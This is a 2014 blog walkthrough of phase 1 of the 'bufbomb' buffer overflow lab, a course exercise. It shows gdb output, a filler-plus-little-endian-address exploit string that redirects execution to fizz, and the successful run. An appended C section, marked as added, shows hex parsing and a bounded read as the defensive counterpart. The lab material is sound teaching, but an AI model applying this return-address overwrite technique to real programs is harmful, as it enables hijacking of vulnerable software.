Sunday, January 12, 2014

Bufbom Phase 1


[plueonde@bert buflab-handout]$ gdb bufbomb
GNU gdb (GDB) Red Hat Enterprise Linux (7.0.1-45.el5)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /mnt_nfs/home3/ugrad3/plueonde/Downloads/buflab-handout/bufbomb...(no debugging symbols found)...done.
(gdb) b getbuf
Breakpoint 1 at 0x8049088
Run the program with your userid to get your cookie
(gdb) r -u plueon2
Starting program: /mnt_nfs/home3/ugrad3/plueonde/Downloads/buflab-handout/bufbomb -u plueon2
Userid: plueon2
Cookie: 0x34fd7256
Breakpoint 1, 0x08049088 in getbuf ()
The goal of phase 1 is to overflow the buffer in getbuf so that the saved return address is overwritten with the address of fizz
(gdb) disas fizz
Dump of assembler code for function fizz:
0x08048c58 <fizz+0>:    push   %ebp <= address of fizz function
0x08048c59 <fizz+1>:    mov    %esp,%ebp
0x08048c5b <fizz+3>:    sub    $0x8,%esp
0x08048c5e <fizz+6>:    mov    0x8(%ebp),%eax
0x08048c61 <fizz+9>:    cmp    0x804c1e4,%eax
0x08048c67 <fizz+15>:    jne    0x8048c87 <fizz+47>
0x08048c69 <fizz+17>:    mov    %eax,0x4(%esp)
0x08048c6d <fizz+21>:    movl   $0x804a1bd,(%esp)
0x08048c74 <fizz+28>:    call   0x8048870 <printf@plt>
0x08048c79 <fizz+33>:    movl   $0x1,(%esp)
0x08048c80 <fizz+40>:    call   0x80490a0 <validate>
0x08048c85 <fizz+45>:    jmp    0x8048c97 <fizz+63>
0x08048c87 <fizz+47>:    mov    %eax,0x4(%esp)
0x08048c8b <fizz+51>:    movl   $0x804a08c,(%esp)
0x08048c92 <fizz+58>:    call   0x8048870 <printf@plt>
0x08048c97 <fizz+63>:    movl   $0x0,(%esp)
0x08048c9e <fizz+70>:    call   0x8048930 <exit@plt>
End of assembler dump.
(gdb) quit
Next step: create the buffer overflow to the fizz function, using hex2raw to generate the string.
The file consists of 0x61 bytes (the letter a in hexadecimal) to fill the buffer, followed by the address of fizz in reversed (little-endian) byte order, so 0x08048c58 is written as 58 8c 04 08.
[plueonde@bert buflab-handout]$ vim exploit2.txt
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
58 8c 04 08
Save the file and test it out
[plueonde@bert buflab-handout]$ cat exploit2.txt | ./hex2raw | ./bufbomb -u plueon2
Userid: plueon2
Cookie: 0x34fd7256
Type string: You called fizz()  <= the task is complete
VALID
NICE JOB!
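As an added illustration (not part of the lab handout or of this post), the C below mirrors the pieces the phase relies on from the defender's side: a hex2raw-style parser for the exploit text, the little-endian encoding behind the "reverse address", and a bounded replacement for the unchecked read that makes the overflow possible. The 36-byte buffer size is an assumption for illustration; the post does not state getbuf's real buffer size.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Assumed for illustration: the post never states getbuf's buffer size,
 * so a 36-byte buffer stands in for it here. */
#define BUF_SIZE 36

/* hex2raw-style conversion: "58 8c 04 08" -> bytes 0x58 0x8c 0x04 0x08.
 * Returns the byte count; stops at the first token that is not a hex pair. */
size_t hex_to_raw(const char *hex, uint8_t *out, size_t max) {
    size_t n = 0;
    while (n < max) {
        while (isspace((unsigned char)*hex)) hex++;
        if (!isxdigit((unsigned char)hex[0]) || !isxdigit((unsigned char)hex[1]))
            break;
        char pair[3] = { hex[0], hex[1], '\0' };
        out[n++] = (uint8_t)strtoul(pair, NULL, 16);
        hex += 2;
    }
    return n;
}

/* The post's "reverse address": x86 stores a 32-bit value least-significant
 * byte first, so 0x08048c58 is written as 58 8c 04 08. */
void le32(uint32_t v, uint8_t out[4]) {
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(v >> (8 * i));
}

/* Hardened read for a getbuf-style buffer: an unbounded gets()-style read copies
 * every payload byte, letting the tail reach the saved return address; this one
 * keeps at most BUF_SIZE-1 bytes, NUL-terminates, and returns how many it refused. */
size_t bounded_getbuf(const uint8_t *in, size_t len, char buf[BUF_SIZE]) {
    size_t n = len < BUF_SIZE - 1 ? len : BUF_SIZE - 1;
    memcpy(buf, in, n);
    buf[n] = '\0';
    return len - n;
}

int main(void) {
    const char *hex = "61 61 61 61 61 61 61 61 58 8c 04 08"; /* constructed */
    uint8_t raw[64];
    char buf[BUF_SIZE];
    size_t len = hex_to_raw(hex, raw, sizeof raw);
    printf("%zu payload bytes, %zu refused\n", len, bounded_getbuf(raw, len, buf));
    return 0;
}
```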
